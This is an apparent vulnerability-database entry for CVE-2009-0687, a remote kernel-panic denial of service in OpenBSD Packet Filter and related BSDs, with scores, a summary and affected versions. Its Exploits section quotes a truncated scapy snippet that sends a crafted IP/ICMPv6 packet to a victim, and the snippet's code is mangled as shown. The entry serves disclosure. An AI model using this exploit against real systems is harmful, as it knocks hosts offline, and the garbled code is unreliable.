7.8
CVSSv2

CVE-2009-0687

Published: 11/08/2009 Updated: 29/09/2017
CVSS v2 Base Score: 7.8 | Impact Score: 6.9 | Exploitability Score: 10
VMScore: 795
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C

Vulnerability Summary

The pf_test_rule function in OpenBSD Packet Filter (PF), as used in OpenBSD 4.2 up to and including 4.5, NetBSD 5.0 before RC3, MirOS 10 and previous versions, and MidnightBSD 0.3-current allows remote malicious users to cause a denial of service (panic) via crafted IP packets that trigger a NULL pointer dereference during translation, related to an IPv4 packet with an ICMPv6 payload.

Vulnerable Product Search on Vulmon Subscribe to Product

netbsd netbsd 5.0

midnightbsd midnightbsd 0.3-current

mirbsd miros

openbsd openbsd 4.2

openbsd openbsd 4.3

openbsd openbsd 4.4

openbsd openbsd 4.5

Exploits

_ _ _____ _ ___ _____ _ _ / / / / ____/ / / _/_ __/ / / / / /_/ / __/ / / / / / / / /_/ / / __ / /___/ /____/ / / / / __ / /_/ /_/_____/_____/___/ /_/ /_/ /_/ Helith - 0815 ---------------------------------------- ...
_ _ _____ _ ___ _____ _ _ / / / / ____/ / / _/_ __/ / / / / /_/ / __/ / / / / / / / /_/ / / __ / /___/ /____/ / / / / __ / /_/ /_/_____/_____/___/ /_/ /_/ /_/ Helith - 0815 ---------------------------------------- ...
import sys from scapy import * victim=sysargv[1] icmpv6=58 p=IP(dst=victim) pproto=icmpv6 sr(p,timeout=1) # milw0rmcom [2009-04-14] ...